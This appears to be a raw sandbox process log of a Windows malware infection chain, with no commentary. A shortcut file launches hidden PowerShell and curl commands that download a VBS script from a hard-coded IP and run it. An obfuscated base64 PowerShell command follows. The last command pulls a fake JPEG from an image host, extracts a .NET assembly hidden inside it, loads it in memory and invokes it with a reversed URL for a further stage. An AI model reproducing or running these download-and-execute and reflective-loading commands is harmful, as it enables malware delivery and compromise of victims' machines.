cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "HIxFWZd" C:\Users\test22\AppData\Local\Temp\Fsociety.lnk
3008powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden curl http://192.210.175.4/TSTA/1/IE_root.vbs -o C:\Windows\Temp\Debug.vbs ;Start-Process C:\Windows\Temp\Debug.vbs
2204powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden curl http://192.210.175.4/TSTA/1/IE_root.vbs -o C:\Windows\Temp\Debug.vbs
200curl.exe "C:\util\curl\curl.exe" http://192.210.175.4/TSTA/1/IE_root.vbs -o C:\Windows\Temp\Debug.vbs
2420powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⁂⇵Bp⁂⇵G0⁂⇵YQBn⁂⇵GU⁂⇵VQBy⁂⇵Gw⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵JwBo⁂⇵HQ⁂⇵d⁂⇵Bw⁂⇵HM⁂⇵Og⁂⇵v⁂⇵C8⁂⇵dQBw⁂⇵Gw⁂⇵bwBh⁂⇵GQ⁂⇵Z⁂⇵Bl⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBu⁂⇵HM⁂⇵LgBj⁂⇵G8⁂⇵bQ⁂⇵u⁂⇵GI⁂⇵cg⁂⇵v⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBz⁂⇵C8⁂⇵M⁂⇵⁂⇵w⁂⇵DQ⁂⇵Lw⁂⇵1⁂⇵DU⁂⇵OQ⁂⇵v⁂⇵DU⁂⇵MQ⁂⇵w⁂⇵C8⁂⇵bwBy⁂⇵Gk⁂⇵ZwBp⁂⇵G4⁂⇵YQBs⁂⇵C8⁂⇵cgB1⁂⇵G0⁂⇵c⁂⇵Bf⁂⇵H⁂⇵⁂⇵cgBp⁂⇵HY⁂⇵YQB0⁂⇵GU⁂⇵LgBq⁂⇵H⁂⇵⁂⇵Zw⁂⇵/⁂⇵DE⁂⇵Ng⁂⇵5⁂⇵D⁂⇵⁂⇵NQ⁂⇵w⁂⇵DQ⁂⇵MQ⁂⇵y⁂⇵Dk⁂⇵Jw⁂⇵7⁂⇵CQ⁂⇵dwBl⁂⇵GI⁂⇵QwBs⁂⇵Gk⁂⇵ZQBu⁂⇵HQ⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵TgBl⁂⇵Hc⁂⇵LQBP⁂⇵GI⁂⇵agBl⁂⇵GM⁂⇵d⁂⇵⁂⇵g⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵TgBl⁂⇵HQ⁂⇵LgBX⁂⇵GU⁂⇵YgBD⁂⇵Gw⁂⇵aQBl⁂⇵G4⁂⇵d⁂⇵⁂⇵7⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵EI⁂⇵eQB0⁂⇵GU⁂⇵cw⁂⇵g⁂⇵D0⁂⇵I⁂⇵⁂⇵k⁂⇵Hc⁂⇵ZQBi⁂⇵EM⁂⇵b⁂⇵Bp⁂⇵GU⁂⇵bgB0⁂⇵C4⁂⇵R⁂⇵Bv⁂⇵Hc⁂⇵bgBs⁂⇵G8⁂⇵YQBk⁂⇵EQ⁂⇵YQB0⁂⇵GE⁂⇵K⁂⇵⁂⇵k⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBV⁂⇵HI⁂⇵b⁂⇵⁂⇵p⁂⇵Ds⁂⇵J⁂⇵Bp⁂⇵G0⁂⇵YQBn⁂⇵GU⁂⇵V⁂⇵Bl⁂⇵Hg⁂⇵d⁂⇵⁂⇵g⁂⇵D0⁂⇵I⁂⇵Bb⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵V⁂⇵Bl⁂⇵Hg⁂⇵d⁂⇵⁂⇵u⁂⇵EU⁂⇵bgBj⁂⇵G8⁂⇵Z⁂⇵Bp⁂⇵G4⁂⇵ZwBd⁂⇵Do⁂⇵OgBV⁂⇵FQ⁂⇵Rg⁂⇵4⁂⇵C4⁂⇵RwBl⁂⇵HQ⁂⇵UwB0⁂⇵HI⁂⇵aQBu⁂⇵Gc⁂⇵K⁂⇵⁂⇵k⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBC⁂⇵Hk⁂⇵d⁂⇵Bl⁂⇵HM⁂⇵KQ⁂⇵7⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵Jw⁂⇵8⁂⇵Dw⁂⇵QgBB⁂⇵FM⁂⇵RQ⁂⇵2⁂⇵DQ⁂⇵XwBT⁂⇵FQ⁂⇵QQBS⁂⇵FQ⁂⇵Pg⁂⇵+⁂⇵Cc⁂⇵Ow⁂⇵k⁂⇵GU⁂⇵bgBk⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵Jw⁂⇵8⁂⇵Dw⁂⇵QgBB⁂⇵FM⁂⇵RQ⁂⇵2⁂⇵DQ⁂⇵XwBF⁂⇵E4⁂⇵R⁂⇵⁂⇵+⁂⇵D4⁂⇵Jw⁂⇵7⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵g⁂⇵D0⁂⇵I⁂⇵⁂⇵k⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBU⁂⇵GU⁂⇵e⁂⇵B0⁂⇵C4⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵E8⁂⇵Zg⁂⇵o⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵KQ⁂⇵7⁂⇵CQ⁂⇵ZQBu⁂⇵GQ⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵FQ⁂⇵ZQB4⁂⇵HQ⁂⇵LgBJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵TwBm⁂⇵Cg⁂⇵J⁂⇵Bl⁂⇵G4⁂⇵Z⁂⇵BG⁂⇵Gw⁂⇵YQBn⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵HM⁂⇵d⁂⇵Bh⁂⇵HI⁂⇵d⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵I⁂⇵⁂⇵t⁂⇵Gc⁂⇵ZQ⁂⇵g⁂⇵D⁂⇵⁂⇵I⁂⇵⁂⇵t⁂⇵GE⁂⇵bgBk⁂⇵C⁂⇵⁂⇵J⁂⇵Bl⁂⇵G4⁂⇵Z⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵I⁂⇵⁂⇵t⁂⇵Gc⁂⇵d⁂⇵⁂⇵g⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵7⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵g⁂⇵Cs⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵LgBM⁂⇵GU⁂⇵bgBn⁂⇵HQ⁂⇵a⁂⇵⁂⇵7⁂⇵CQ⁂⇵YgBh⁂⇵HM⁂⇵ZQ⁂⇵2⁂⇵DQ⁂⇵T⁂⇵Bl⁂⇵G4⁂⇵ZwB0⁂⇵Gg⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵J⁂⇵Bl⁂⇵G4⁂⇵Z⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵I⁂⇵⁂⇵t⁂⇵C⁂⇵⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵Ds⁂⇵J⁂⇵Bi⁂⇵GE⁂⇵cwBl⁂⇵DY⁂⇵N⁂⇵BD⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵FQ⁂⇵ZQB4⁂⇵HQ⁂⇵LgBT⁂⇵HU⁂⇵YgBz⁂⇵HQ⁂⇵cgBp⁂⇵G4⁂⇵Zw⁂⇵o⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵s⁂⇵C⁂⇵⁂⇵J⁂⇵Bi⁂⇵GE⁂⇵cwBl⁂⇵DY⁂⇵N⁂⇵BM⁂⇵GU⁂⇵bgBn⁂⇵HQ⁂⇵a⁂⇵⁂⇵p⁂⇵Ds⁂⇵J⁂⇵Bj⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵EI⁂⇵eQB0⁂⇵GU⁂⇵cw⁂⇵g⁂⇵D0⁂⇵I⁂⇵Bb⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵QwBv⁂⇵G4⁂⇵dgBl⁂⇵HI⁂⇵d⁂⇵Bd⁂⇵Do⁂⇵OgBG⁂⇵HI⁂⇵bwBt⁂⇵EI⁂⇵YQBz⁂⇵GU⁂⇵Ng⁂⇵0⁂⇵FM⁂⇵d⁂⇵By⁂⇵Gk⁂⇵bgBn⁂⇵Cg⁂⇵J⁂⇵Bi⁂⇵GE⁂⇵cwBl⁂⇵DY⁂⇵N⁂⇵BD⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵Gw⁂⇵bwBh⁂⇵GQ⁂⇵ZQBk⁂⇵EE⁂⇵cwBz⁂⇵GU⁂⇵bQBi⁂⇵Gw⁂⇵eQ⁂⇵g⁂⇵D0⁂⇵I⁂⇵Bb⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵UgBl⁂⇵GY⁂⇵b⁂⇵Bl⁂⇵GM⁂⇵d⁂⇵Bp⁂⇵G8⁂⇵bg⁂⇵u⁂⇵EE⁂⇵cwBz⁂⇵GU⁂⇵bQBi⁂⇵Gw⁂⇵eQBd⁂⇵Do⁂⇵OgBM⁂⇵G8⁂⇵YQBk⁂⇵Cg⁂⇵J⁂⇵Bj⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵EI⁂⇵eQB0⁂⇵GU⁂⇵cw⁂⇵p⁂⇵Ds⁂⇵J⁂⇵B0⁂⇵Hk⁂⇵c⁂⇵Bl⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵b⁂⇵Bv⁂⇵GE⁂⇵Z⁂⇵Bl⁂⇵GQ⁂⇵QQBz⁂⇵HM⁂⇵ZQBt⁂⇵GI⁂⇵b⁂⇵B5⁂⇵C4⁂⇵RwBl⁂⇵HQ⁂⇵V⁂⇵B5⁂⇵H⁂⇵⁂⇵ZQ⁂⇵o⁂⇵Cc⁂⇵RgBp⁂⇵GI⁂⇵ZQBy⁂⇵C4⁂⇵S⁂⇵Bv⁂⇵G0⁂⇵ZQ⁂⇵n⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵G0⁂⇵ZQB0⁂⇵Gg⁂⇵bwBk⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵d⁂⇵B5⁂⇵H⁂⇵⁂⇵ZQ⁂⇵u⁂⇵Ec⁂⇵ZQB0⁂⇵E0⁂⇵ZQB0⁂⇵Gg⁂⇵bwBk⁂⇵Cg⁂⇵JwBW⁂⇵EE⁂⇵SQ⁂⇵n⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵GE⁂⇵cgBn⁂⇵HU⁂⇵bQBl⁂⇵G4⁂⇵d⁂⇵Bz⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵Cw⁂⇵K⁂⇵⁂⇵n⁂⇵HQ⁂⇵e⁂⇵B0⁂⇵C4⁂⇵S⁂⇵BC⁂⇵C8⁂⇵QQBU⁂⇵FM⁂⇵V⁂⇵⁂⇵v⁂⇵DQ⁂⇵Lg⁂⇵1⁂⇵Dc⁂⇵MQ⁂⇵u⁂⇵D⁂⇵⁂⇵MQ⁂⇵y⁂⇵C4⁂⇵Mg⁂⇵5⁂⇵DE⁂⇵Lw⁂⇵v⁂⇵Do⁂⇵c⁂⇵B0⁂⇵HQ⁂⇵a⁂⇵⁂⇵n⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵G0⁂⇵ZQB0⁂⇵Gg⁂⇵bwBk⁂⇵C4⁂⇵SQBu⁂⇵HY⁂⇵bwBr⁂⇵GU⁂⇵K⁂⇵⁂⇵k⁂⇵G4⁂⇵dQBs⁂⇵Gw⁂⇵L⁂⇵⁂⇵g⁂⇵CQ⁂⇵YQBy⁂⇵Gc⁂⇵dQBt⁂⇵GU⁂⇵bgB0⁂⇵HM⁂⇵KQ⁂⇵=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂⇵','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
2528powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/559/510/original/rump_private.jpg?1690504129';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.HB/ATST/4.571.012.291//:ptth');$method.Invoke($null, $arguments)"
1392